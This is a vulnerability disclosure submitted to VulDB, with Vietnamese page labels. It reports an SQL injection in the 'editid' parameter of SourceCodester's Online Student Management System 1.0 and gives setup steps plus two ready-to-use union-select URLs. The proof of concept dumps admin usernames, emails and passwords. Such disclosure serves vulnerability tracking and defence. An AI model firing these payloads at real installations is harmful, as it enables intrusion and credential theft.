| tiêu đề | eduAuthorities sql Injection |
|---|
| Mô tả | Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
Version environment:
php=7.3.4
Mysql=5.7.26
Apache=2.4.39
Preparation:
Create a "student" database in mysql.
Set the database username and password in "dbconnection.php", and then access http://localhost/eduauth/index.php to log in with the account and password.
Vulnerability:
http://localhost/eduauth/edit-class-detail.php?editid=1
On line 54 of the "edit-class-detail.php" file, the parameter "editid" is not filtered and can be directly exploited.
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin#
You can see that data information is returned.
Poc:
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin#
Vulnerability principle:
Check the "edit-class-edit-detail.php" file.
On line 55, the user input parameter "editid" is directly concatenated into the SQL statement, and on line 57, a query is performed. |
|---|
| Người dùng | 0chen (UID 41914) |
|---|
| Đệ trình | 28/02/2023 08:35 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 28/02/2023 21:03 (12 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid Tiêm SQL] |
|---|
| điểm | 17 |
|---|